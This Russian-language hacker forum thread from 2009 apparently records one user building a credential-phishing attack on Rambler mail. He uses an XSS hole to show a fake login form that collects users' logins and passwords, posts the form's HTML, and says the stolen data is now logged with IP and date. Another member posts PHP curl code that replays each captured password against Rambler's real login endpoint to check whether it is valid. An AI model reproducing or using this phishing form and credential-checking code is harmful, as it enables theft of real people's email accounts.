ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос по поводу xss + фейк.
  #1  
Старый 16.03.2009, 22:16
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию Вопрос по поводу xss + фейк.

Подскажите пожалуйста. Замучался искать примеры - пару часов ищу по всему яндексу.

Раньше я использовал команду POST при передачи и записи файлов из обычного фейка в файл.

Сейчас я нашёл xss на рамблере - сделал всё правильно, т.е. вставил в эту xss фейк рамблера. И тут встретилась команда GET. Вопрос такой: какой код команды GET в принимающем файле от xss с js-ява скриптом надо прописать в принимающем файле для приёма логина и пароля. Хоть приблизительно накиньте - а там я доделаю. Замучался искать просто.
 
Ответить с цитированием

  #2  
Старый 16.03.2009, 22:21
Аватар для Zitt
Zitt
Познавший АНТИЧАТ
Регистрация: 07.05.2006
Сообщений: 1,031
Провел на форуме:
5885100

Репутация: 773


Отправить сообщение для Zitt с помощью ICQ
По умолчанию

исправь у себя $_POST на $_GET =)
 
Ответить с цитированием

  #3  
Старый 16.03.2009, 22:22
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию

Исправил - не помогает. Уже всё перепробовал.

Сам скрипт ява имеет такой вид:

PHP код:
<form method="get" action="'+getaction+'" name="auth_form"><input type="hidden" name="from" value=""><input type="hidden" name="back" value="http://mail.rambler.ru/mail/startpage"><input type="hidden" name="url" value=""><table cellpadding="5" cellspacing="0" border="0" width="100%"><tr valign="top"><td class="txt" align="left" width="22%"><label for="login">Ваше имя на Рамблере (логин):</label></td><td width="230"><table cellpadding="0" cellspacing="0" border="0" width="230" <tr><td width="100%"><input type="text" name="Login" id="login" value="" size="10" maxlength="129" tabindex="1" style="width: 100%;"></td><td valign="top">&nbsp;<span class="txt">@rambler.ru</span></td></tr></table></td><td rowspan="3" width="5%"></td><td rowspan="2" align="left"><div class="ttl_small">Нет имени?</div><div class="txt"><a ref="http://id.rambler.ru/script/newuser.cgi?back=http%3A%2F%2Fmail.rambler.ru%2Fmail%2Fstartpage">Выберите имя 

Последний раз редактировалось anton15; 16.03.2009 в 22:30..
 
Ответить с цитированием

  #4  
Старый 16.03.2009, 22:55
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Должен работать, если все правильно изменил.
 
Ответить с цитированием

  #5  
Старый 16.03.2009, 22:59
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию

Записываются, но только две точки... логина и пароля нет. Переменные вроде бы правильные: Login и passw - в скрипте такие же... Когда то было такое, причиной были переменные и их названия, но сейчас они правильные... тогда почему точки?
 
Ответить с цитированием

  #6  
Старый 16.03.2009, 23:14
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию

Есть где-нибудь фейк такого же типа через xss на примере, хоть старый трёхлетней давности с закрытой xss на одном из емайл сервисов? если есть скиньте пожалуйста ссылочку. Я посмотрю и на примере сделаю.
 
Ответить с цитированием

  #7  
Старый 17.03.2009, 01:14
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию

Тема закрыта. Спасибо Всем за внимание. Сейчас сяду, часков пять голову поломаю и заработает, а куда она ещё денется
 
Ответить с цитированием

  #8  
Старый 21.03.2009, 00:20
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию

Сделал данную вещь, всё записывается, также прописал, чтобы записывался ip, дата, и удаление письма если надо.

У меня возник опять вопросик:

Нужно сделать так, чтобы фейк был и проверял данные по правильности и на валидность (с проверкой на валидность вводимых паролей) - т.е. человек заходит на форму фейка, далее вводит пароль - если он ввёл пароль не правильно, то его перебрасывает на страницу, которую я укажу с предупреждением: пароль введён не верно; а если он ввёл правильно, то перебрасывает на страницу, которую я укажу - с указанием, спасибо, всё введено правильно.

Может кто-нибудь дать пример? как это всё сделать - может есть у кого-нибудь пример данного скрипта? Мне бы примерчик, а там я додумаю.
 
Ответить с цитированием

  #9  
Старый 21.03.2009, 01:39
Аватар для .:EnoT:.
.:EnoT:.
Постоянный
Регистрация: 29.05.2007
Сообщений: 852
Провел на форуме:
4832771

Репутация: 1916


По умолчанию

Да принцип простой. Отправляешь полученные данные на рамблер и смотришь.

PHP код:
<?php

$login 
'qwerty';
$password '12345';

$postdata 'back=http%3A%2F%2Fmail.rambler.ru%2Fmail%2Fstartpage&login=' $login '&passw=' $password;

$cl curl_init('http://id.rambler.ru/script/auth.cgi');
curl_setopt($clCURLOPT_RETURNTRANSFER1);
curl_setopt($clCURLOPT_POST1);
curl_setopt($clCURLOPT_POSTFIELDS$postdata);
$result curl_exec($cl);
curl_close($cl);

?>
Далее в ответе ищешь совпадение на фразу "Неправильный логин или пароль". Если присутствует, заставляй логиниться ещё раз.
 
Ответить с цитированием

  #10  
Старый 21.03.2009, 01:56
Аватар для anton15
anton15
Новичок
Регистрация: 27.02.2009
Сообщений: 7
Провел на форуме:
57607

Репутация: 5
По умолчанию

Всё понял приблизительно - дальше додумаю...

когда пять часиков голову поломаю...

Всем большое спасибо за внимание к моей теме - всем очень благодарен. Всех благодарю.

Тема закрыта, модератор можешь тему удалять, а можешь оставить.

Всем Доброго времени суток.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Вопрос про XSS Onesex Сценарии/CMF/СMS 6 19.02.2009 21:09
Вопрос по поводу античатовского снифера. Заранее большое спасибо за ответ. -SX- Болталка 5 23.10.2006 20:20
Вопрос по использованию пассивной Xss add Форумы 3 08.07.2006 03:14
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ